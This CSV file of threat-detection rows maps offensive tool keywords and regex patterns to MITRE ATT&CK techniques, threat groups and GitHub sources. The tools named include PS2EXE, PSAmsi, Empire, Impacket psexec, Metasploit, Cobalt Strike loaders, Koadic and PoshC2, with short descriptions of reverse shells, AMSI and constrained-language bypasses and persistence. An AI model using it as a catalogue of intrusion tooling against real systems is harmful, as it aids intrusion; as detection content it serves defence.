"*PS2EXE -content $* -outputFile *",".{0,1000}PS2EXE\s\-content\s\$.{0,1000}\s\-outputFile\s.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","55666"
"*ps2exe.ps1*",".{0,1000}ps2exe\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55667"
"*ps2exe.psd1*",".{0,1000}ps2exe\.psd1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55668"
"*ps2exe.psm1*",".{0,1000}ps2exe\.psm1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55669"
"*PS2EXE-master*",".{0,1000}PS2EXE\-master.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","55670"
"*PSAmsiClient.ps1*",".{0,1000}PSAmsiClient\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","55671"
"*PSAmsiScanner.ps1*",".{0,1000}PSAmsiScanner\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","55672"
"*PSAsyncShell by @JoelGMSec*",".{0,1000}PSAsyncShell\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","55673"
"*PSAttack*",".{0,1000}PSAttack.{0,1000}","offensive_tool_keyword","PSAttack","PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. Its designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. It does this with in a couple of ways.","T1059 - T1112 - T1055 - T1566","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/jaredhaight/PSAttack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55674"
"*PSAttack.exe*",".{0,1000}PSAttack\.exe.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","55675"
"*PSAttack.Resources.BuildDate.txt*",".{0,1000}PSAttack\.Resources\.BuildDate\.txt.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","55676"
"*PSByPassCLM*",".{0,1000}PSByPassCLM.{0,1000}","offensive_tool_keyword","PSByPassCLM","Bypass for PowerShell Constrained Language Mode","T1027 - T1059 - T1218 - T1086 - T1089","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/padovah4ck/PSByPassCLM","1","0","N/A","N/A","N/A","4","389","52","2021-12-23T16:29:01Z","2018-09-13T07:27:18Z","55678"
"*PSCMD channel was either not defined while connecting OR the channel name is not the default.*",".{0,1000}PSCMD\schannel\swas\seither\snot\sdefined\swhile\sconnecting\sOR\sthe\schannel\sname\sis\snot\sthe\sdefault\..{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","55680"
"*pscmd/serverscript.ps1*",".{0,1000}pscmd\/serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","55681"
"*pscmd\serverscript.ps1*",".{0,1000}pscmd\\serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","55682"
"*PSconfusion.py*",".{0,1000}PSconfusion\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","55683"
"*pse2john.py*",".{0,1000}pse2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","55685"
"*ps-empire client*",".{0,1000}ps\-empire\sclient.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55686"
"*ps-empire server*",".{0,1000}ps\-empire\sserver.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55687"
"*ps-empire*",".{0,1000}ps\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55688"
"*psexec.py*",".{0,1000}psexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","55691"
"*psexec_ms17_010.rb*",".{0,1000}psexec_ms17_010\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55693"
"*PSEXEC_PSH *",".{0,1000}PSEXEC_PSH\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","55694"
"*-PsExecCmd*",".{0,1000}\-PsExecCmd.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55696"
"*PsExecLiveImplant*",".{0,1000}PsExecLiveImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","55697"
"*PsExecMenu(*",".{0,1000}PsExecMenu\(.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55698"
"*PSExecSVC remote orchestrator*",".{0,1000}PSExecSVC\sremote\sorchestrator.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","55699"
"*pseymour/MakeMeAdmin*",".{0,1000}pseymour\/MakeMeAdmin.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","55702"
"*psinject * x64 Invoke-*",".{0,1000}psinject\s.{0,1000}\sx64\sInvoke\-.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55704"
"*psinject -PID*",".{0,1000}psinject\s\-PID.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55705"
"*PSInvoke_BloodHound*",".{0,1000}PSInvoke_BloodHound.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","55706"
"*PSLessExec.exe *",".{0,1000}PSLessExec\.exe\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","55707"
"*pslo *.ps1*",".{0,1000}pslo\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55708"
"*PsMapExec -*",".{0,1000}PsMapExec\s\-.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","55711"
"*PsMapExec will continue in the current users context*",".{0,1000}PsMapExec\swill\scontinue\sin\sthe\scurrent\susers\scontext.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","55712"
"*PsMapExec.ps1*",".{0,1000}PsMapExec\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","55713"
"*PsMapExec-main*",".{0,1000}PsMapExec\-main.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","55714"
"*pSNIRFgTuZnCdHN*",".{0,1000}pSNIRFgTuZnCdHN.{0,1000}","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","0","N/A","N/A","10","10","1271","271","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z","55715"
"*Pspersist-main*",".{0,1000}Pspersist\-main.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","55716"
